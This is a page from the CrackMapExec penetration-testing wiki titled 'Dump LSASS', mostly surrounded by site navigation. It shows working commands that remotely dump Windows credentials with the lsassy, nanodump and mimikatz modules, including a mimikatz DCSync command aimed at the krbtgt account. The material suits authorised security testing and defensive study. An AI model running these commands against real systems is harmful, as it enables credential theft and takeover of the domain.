π±
π±
π±
π±
CrackMapExec ~ CME WIKI
Public Release - v5.2.2
@byt3bl33d3r
@mpgn_x64
Searchβ¦
Introduction
π₯
News 2022
Changelog
Sponsoring CME
Other Gitbook
Getting Started
Installation
Selecting & Using a Protocol
Target Formats
Using Credentials
Using Kerberos
Using Modules
Database General Usage
π
BloodHound integration
Report bugs or new features
π²
Audit Mode
SMB protocol
π
Scan for vulnerabilities
Enumeration
Password spraying
Authentication
Command execution
Spidering Shares
Get and Put files
Obtaining Credentials
Dump SAM
Dump LSA
Dump NTDS.dit
Dump LSASS
Dump WIFI password
π
Defeating LAPS
π
Spooler, WebDav running ?
LDAP protocol
Authentication
ASREPRoast
Kerberoasting
Unconstrained delegation
Admin Count
Machine Account Quota
Get user descriptions
π
Exploit ESC8 (adcs)
WINRM protocol
Password spraying
Authentication
Command execution
π
Defeating LAPS
MSSQL protocol
Password spraying
Authentication
MSSQL Privesc
MSSQL command
Windows command
SSH protocol
Password spraying
Authentication
Command execution
π
RDP Protocol
Password spraying
Install aardwolf lib
Powered By
GitBook
Dump LSASS
You need at least local admin privilege on the remote target, use option
--local-auth
if your user is a local account
Using Lsassy
Using the module Lsassy from
@pixis
you can dump remotely the credentials
1
#~ cme smb 192.168.255.131 -u administrator -p pass -M lsassy
Copied!
Using nanodump
Using the module nanodump you can dump remotely the credentials
1
#~ cme smb 192.168.255.131 -u administrator -p pass -M nanodump
Copied!
Using Mimikatz (deprecated)
You need at least local admin privilege on the remote target, use option
--local-auth
if your user is a local account
Using the module Mimikatz, the powershell script Invoke-mimikatz.ps1 will be executed on the remote target
1
#~ cme smb 192.168.255.131 -u administrator -p pass -M mimikatz
Copied!
1
#~ cme smb 192.168.255.131 -u Administrator -p pass -M mimikatz -o COMMAND='"lsadump::dcsync /domain:domain.local /user:krbtgt"
Copied!
Previous
Dump NTDS.dit
Next
Dump WIFI password
Last modified
5mo ago
Copy link
Contents
Using Lsassy
Using nanodump
Using Mimikatz (deprecated)